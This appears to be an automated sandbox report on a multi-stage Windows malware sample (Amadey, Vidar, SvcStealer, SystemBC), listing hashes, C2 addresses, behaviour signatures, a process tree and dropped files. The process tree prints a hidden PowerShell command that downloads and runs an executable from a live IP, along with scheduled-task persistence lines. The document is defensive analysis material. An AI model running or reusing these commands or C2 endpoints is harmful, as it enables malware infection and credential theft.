Overview

overview

10

Static

static

5

e177bcf0d2...35.exe

windows7-x64

10

e177bcf0d2...35.exe

windows10-2004-x64

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    05/03/2025, 03:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe

  • Size

    938KB

  • MD5

    ef59bfc4e53fa990607868d76f1a9a93

  • SHA1

    07a2dff253bc24e4683898621cd5a9c01af59ea3

  • SHA256

    e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35

  • SHA512

    31fc8c697e3eedc23c2251b95b34fd24f5d58d9dab5cdb9197d7890497c3aad430f15bf4a02d9c6bf39fdf473a1fd49b40700e36951ba6ee18523374191d1664

  • SSDEEP

    24576:VqDEvCTbMWu7rQYlBQcBiT6rprG8a0xu:VTvC/MTQYxsWR7a0x

Score
10/10
amadeysvcstealersystembcvidar092155ir7amdefense_evasiondiscoverydownloaderexecutionpersistencespywarestealertrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

vidar

Botnet

ir7am

C2

https://t.me/l793oy

https://steamcommunity.com/profiles/76561199829660832
Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

systembc

C2

towerbingobongoboom.com

62.60.226.86
Attributes
  • dns

    5.132.191.104

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

    trojanamadey
  • Amadey family
    amadey
  • Detect Vidar Stealer 7 IoCs
    stealer
  • Detects SvcStealer Payload 5 IoCs

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

  • SvcStealer, Diamotrix

    SvcStealer aka Diamotrix Clipper is a stealer/downloader written in C++.

    stealerdownloadersvcstealer
  • Svcstealer family
    svcstealer
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

    trojansystembc
  • Systembc family
    systembc
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

    stealervidar
  • Vidar family
    vidar
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs
    defense_evasion
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file 16 IoCs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 27 IoCs
  • Identifies Wine through registry keys 2 TTPs 10 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

    defense_evasion
  • Loads dropped DLL 63 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Windows directory 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 6 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
    adwarespyware
  • Modifies system certificate store 2 TTPs 6 IoCs
    defense_evasionspywaretrojan
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 26 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 15 IoCs
  • Suspicious use of SendNotifyMessage 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    PID:1208
    • C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe
      "C:\Users\Admin\AppData\Local\Temp\e177bcf0d2e553d675134dcd71999e0d23548c1a4860aece07208f1fe9a39c35.exe"
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of WriteProcessMemory
      PID:2988
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3004
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /create /tn EwXBGmaLpCK /tr "mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:2068
      • C:\Windows\SysWOW64\mshta.exe
        mshta C:\Users\Admin\AppData\Local\Temp\mS9DEq1mn.hta
        3⤵
        • System Location Discovery: System Language Discovery
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:2064
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Downloads MZ/PE file
          • Loads dropped DLL
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1864
          • C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE
            "C:\Users\Admin\AppData\Local\Temp7JMJCV5QKONIF4I6VPLFETKHRNBIC0ZZ.EXE"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of WriteProcessMemory
            PID:2780
            • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
              "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Downloads MZ/PE file
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Adds Run key to start application
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of WriteProcessMemory
              PID:1936
              • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2936
                • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
                  "C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe"
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  PID:2460
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 500
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1776
              • C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
                "C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2196
              • C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
                "C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:2296
                • C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe
                  "C:\Windows\TEMP\{E5860080-A890-4C75-A53C-AD9FB0757ABC}\.cr\z3SJkC5.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe" -burn.filehandle.attached=216 -burn.filehandle.self=212
                  8⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Drops file in Windows directory
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:2652
                  • C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
                    C:\Windows\TEMP\{E3B35B7F-5DCC-4ADC-B8CE-BC66E8720123}\.ba\WiseTurbo.exe
                    9⤵
                    • Executes dropped EXE
                    PID:1864
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2652 -s 208
                    9⤵
                    • Loads dropped DLL
                    • Program crash
                    PID:2676
              • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
                "C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:1952
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 1200
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1352
              • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
                "C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1688
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1688 -s 1036
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:2252
              • C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
                "C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe"
                7⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                PID:2648
                • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                  "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1580
              • C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
                "C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe"
                7⤵
                • Executes dropped EXE
                PID:2808
              • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
                "C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:2824
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2824 -s 1216
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1328
              • C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe
                "C:\Users\Admin\AppData\Local\Temp\10087020101\OEHBOHk.exe"
                7⤵
                • Executes dropped EXE
                PID:2800
              • C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe
                "C:\Users\Admin\AppData\Local\Temp\10089420101\4klgwMz.exe"
                7⤵
                • Executes dropped EXE
                • Adds Run key to start application
                • Suspicious behavior: EnumeratesProcesses
                PID:880
              • C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe
                "C:\Users\Admin\AppData\Local\Temp\10089720101\8jQumY5.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:2336
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 2336 -s 852
                  8⤵
                  • Loads dropped DLL
                  • Program crash
                  PID:1856
              • C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe
                "C:\Users\Admin\AppData\Local\Temp\10090400101\W6ySCZP.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:2364
                • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                  "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
                  8⤵
                  • Downloads MZ/PE file
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • System Location Discovery: System Language Discovery
                  PID:2300
                  • C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe
                    "C:\Users\Admin\AppData\Roaming\10000710100\feedlablest.exe"
                    9⤵
                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                    • Checks BIOS information in registry
                    • Executes dropped EXE
                    • Identifies Wine through registry keys
                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2372
              • C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe
                "C:\Users\Admin\AppData\Local\Temp\10092140101\Ps7WqSx.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                PID:1824
              • C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe
                "C:\Users\Admin\AppData\Local\Temp\10097700101\amnew.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                PID:2268
                • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                  "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                  8⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Modifies system certificate store
                  PID:792
              • C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe
                "C:\Users\Admin\AppData\Local\Temp\10097710101\6eaad46262.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:2212
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:1976
                  • C:\Windows\SysWOW64\schtasks.exe
                    schtasks /create /tn zlcjtmaYQKF /tr "mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta" /sc minute /mo 25 /ru "Admin" /f
                    9⤵
                    • System Location Discovery: System Language Discovery
                    • Scheduled Task/Job: Scheduled Task
                    PID:904
                • C:\Windows\SysWOW64\mshta.exe
                  mshta C:\Users\Admin\AppData\Local\Temp\I8dYGpBlS.hta
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:3016
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'DWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2348
                    • C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE
                      "C:\Users\Admin\AppData\Local\TempDWXZAXWYCWHDMDYMORKSI7TWZFHUCPX7.EXE"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious behavior: EnumeratesProcesses
                      PID:1696
              • C:\Windows\SysWOW64\cmd.exe
                cmd /c ""C:\Users\Admin\AppData\Local\Temp\10097720121\am_no.cmd" "
                7⤵
                • System Location Discovery: System Language Discovery
                PID:920
                • C:\Windows\SysWOW64\timeout.exe
                  timeout /t 2
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Delays execution with timeout.exe
                  PID:956
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:884
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1384
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2596
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2780
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  PID:2340
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:872
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "O5x0ImaVemy" /tr "mshta \"C:\Temp\8dw7RzrvO.hta\"" /sc minute /mo 25 /ru "Admin" /f
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Scheduled Task/Job: Scheduled Task
                  PID:1944
                • C:\Windows\SysWOW64\mshta.exe
                  mshta "C:\Temp\8dw7RzrvO.hta"
                  8⤵
                  • System Location Discovery: System Language Discovery
                  • Modifies Internet Explorer settings
                  PID:2712
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                    9⤵
                    • Blocklisted process makes network request
                    • Command and Scripting Interpreter: PowerShell
                    • Downloads MZ/PE file
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1584
                    • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                      "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                      10⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      PID:2800
              • C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe
                "C:\Users\Admin\AppData\Local\Temp\10098430101\419c3a2b9d.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:848
  • C:\Windows\system32\taskeng.exe
    taskeng.exe {0102F77C-CFAE-4625-AABC-402260BBCF85} S-1-5-21-312935884-697965778-3955649944-1000:MXQFNXLT\Admin:Interactive:[1]
    1⤵
      PID:2924
      • C:\ProgramData\djrq\nbiciq.exe
        C:\ProgramData\djrq\nbiciq.exe
        2⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:544

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Modify Registry

    3
    T1112

    Subvert Trust Controls

    1
    T1553

    Install Root Certificate

    1
    T1553.004

    Virtualization/Sandbox Evasion

    2
    T1497

    Credential Access

    Credentials from Password Stores

    1
    T1555

    Credentials from Web Browsers

    1
    T1555.003

    Unsecured Credentials

    3
    T1552

    Credentials In Files

    3
    T1552.001

    Discovery

    Browser Information Discovery

    1
    T1217

    Query Registry

    4
    T1012

    System Information Discovery

    2
    T1082

    System Location Discovery

    1
    T1614

    System Language Discovery

    1
    T1614.001

    Virtualization/Sandbox Evasion

    2
    T1497

    Lateral Movement

    Collection

    Data from Local System

    3
    T1005

    Command and Control

    Exfiltration

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
      Filesize

      71KB

      MD5

      83142242e97b8953c386f988aa694e4a

      SHA1

      833ed12fc15b356136dcdd27c61a50f59c5c7d50

      SHA256

      d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

      SHA512

      bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe
      Filesize

      350KB

      MD5

      b60779fb424958088a559fdfd6f535c2

      SHA1

      bcea427b20d2f55c6372772668c1d6818c7328c9

      SHA256

      098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

      SHA512

      c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe
      Filesize

      1.8MB

      MD5

      9dadf2f796cd4500647ab74f072fd519

      SHA1

      92b6c95a6ed1e120488bd28ac74274e874f6e740

      SHA256

      e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76

      SHA512

      fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10052020101\z3SJkC5.exe
      Filesize

      7.8MB

      MD5

      001d7acad697c62d8a2bd742c4955c26

      SHA1

      840216756261f1369511b1fd112576b3543508f7

      SHA256

      de53f6f359af6ccc361faf2aa74690c9575b987a01f1250a6eb042cf9d4ea4af

      SHA512

      f06039d1d7ad28a04877e4eabb6fb7a5137a0040b8c316bee502bce6c68058bfe62db9480674bb69c9aeabae34304adeeff86dc3a8427929d00a842d2f2e80eb

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10062780101\JqGBbm7.exe
      Filesize

      2.9MB

      MD5

      30c1a6337089e68b975438caebc8f497

      SHA1

      2cf2324672cf72b9bc1869633f3bf6904bb61011

      SHA256

      db15e9537c66a283d59f45e262018c45ef3fc5416b292b2c5269f4f9a4f10017

      SHA512

      be8f68704c02b41bddbd94382d30197b13f68c783d041a077b35579c1a791a82bc68d99f828eb3b09c859237256791dd2d1c39eacf4e09ec2bd3f2aa6b54a484

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10075800101\zY9sqWs.exe
      Filesize

      361KB

      MD5

      2bb133c52b30e2b6b3608fdc5e7d7a22

      SHA1

      fcb19512b31d9ece1bbe637fe18f8caf257f0a00

      SHA256

      b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630

      SHA512

      73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10077730101\JCFx2xj.exe
      Filesize

      12.4MB

      MD5

      7ff72f21d83d3abdc706781fb3224111

      SHA1

      3bfbe059b8e491bde4919fb29afa84d4ea1c0fa8

      SHA256

      0c54843666a464f185c97a7693a91eb328827a900717e414357b897bd2630fea

      SHA512

      dbb3c7b618bc2c80dae90ff902100d3902ddffe5705cf0c648b8b3f702fd8814b9cf66490e3260e09d36c1ce57bfc05d3f9bb0fc089c5ec7c553eb8a94d3320d

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10078350101\BXxKvLN.exe
      Filesize

      1.7MB

      MD5

      971c0e70de5bb3de0c9911cf96d11743

      SHA1

      43badfc19a7e07671817cf05b39bc28a6c22e122

      SHA256

      67c9bb968cd0de2bfb2c24b00cfb2b98ac7403135ea47d98961652518584e45d

      SHA512

      a46523d8c71c0df25a043e2250ee1b6792e147314ec2097870a7972c892fd1a2022994f10823dadf54f161d11e808251b85a18efb9db9450d97af4b2f173f3c2

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\10079230101\v6Oqdnc.exe
      Filesize

      2.0MB

      MD5

      6006ae409307acc35ca6d0926b0f8685

      SHA1

      abd6c5a44730270ae9f2fce698c0f5d2594eac2f

      SHA256

      a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b

      SHA512

